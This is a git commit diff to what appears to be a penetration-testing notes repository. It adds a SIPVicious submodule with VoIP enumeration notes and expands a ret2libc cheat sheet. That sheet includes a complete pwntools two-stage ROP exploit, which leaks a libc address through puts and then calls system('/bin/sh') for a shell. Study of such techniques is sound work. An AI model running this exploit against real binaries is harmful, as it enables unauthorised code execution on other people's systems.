bump

.gitmodules

@@ -103,3 +103,6 @@
 [submodule "exploit/windows/CrackMapExec"]
 	path = exploit/windows/CrackMapExec
 	url = https://github.com/byt3bl33d3r/CrackMapExec.git
+[submodule "telecommunications/sipvicious"]
+	path = telecommunications/sipvicious
+	url = https://github.com/EnableSecurity/sipvicious.git

exploit/binaries/ret2libc.md

@@ -1,8 +1,23 @@
 # Ret2libc
 
+* Check binary via
+    * `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
+    * `file`
+* Libc is affected by ASLR state of the machine, check via `cat /proc/sys/kernel/randomize_va_space`
+    * Off = 0
+    * Partial = 1
+    * Full = 2
+* `got` contains dynamically loaded functions
+* `plt` contains used loaded dynamical functions
 
-## Finding offsets
+## Finding something to execute
+* Interesting stuff to call from inside libc
+    * `/bin/sh`
+    * `system`
 
+## libc -- Finding Offsets 
+
+### Manually
 * On target find `sh` address inside libc
 ```sh
 strings -a -t x /lib32/libc.so.6 | grep /bin/sh
@@ -11,3 +26,59 @@ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
 ```sh
 readelf -s /lib32/libc.so.6 | grep system
 ```
+
+### Measure the Buffer
+* With gef
+    * `create pattern`
+    * `run`
+    * Use pattern
+    * `pattern search $<register>`
+
+## ROP -- Creating a Chain
+
+* Creating a ROP chain to execute the `/bin/sh` with parameters
+* Check
+    * Architecture
+    * Calling convention
+
+## Usage
+* Create context
+```python
+#!/usr/bin/env python3
+
+from pwn import *
+
+context.binary = binary = '<binary>'
+elf = ELF(binary)
+rop = ROP(elf)
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+p = process()
+
+# ROP I, needed when ASL is enabled
+payload =  b'A' * 18
+payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
+payload += p64(elf.got.gets)
+payload += p64(elf.plt.puts)
+payload += p64(elf.symbols.main)
+
+p.recvline()
+p.sendline(payload)
+p.recvline()
+leak = u64(p.recvline().strip().ljust(8,b'\0')) # ljust, pre padding for alignement
+p.recvline()
+
+log.info(f"gets: {hex(leak)}")
+libc.address = leak - libc.symbols.gets
+log.info(f"libc address: {hex(libc.address)}")  # start address should be aligned
+
+# ROP II
+payload = b'A' * 18
+payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
+payload += p64(next(libc.search(b'/bin/sh')))
+payload += p64(rop.find_gadget(['ret'])[0])
+payload += p64(libc.symbols.system)
+
+p.sendline(payload)
+p.recvline()
+p.interactive()
+```

telecommunications/sipvicious

@@ -0,0 +1 @@
+Subproject commit db051d8845a11ae458acc79cf5104cef28dc3f25

telecommunications/sipvicious.md

@@ -0,0 +1,7 @@
+# Sipvicious
+
+* [Enable Security](https://github.com/EnableSecurity/sipvicious.git)
+
+# Enumeration
+* Check which PBX is used via `svmap $TARGET_IP`
+* Use `msf6 auxiliary(voip/asterisk_login)`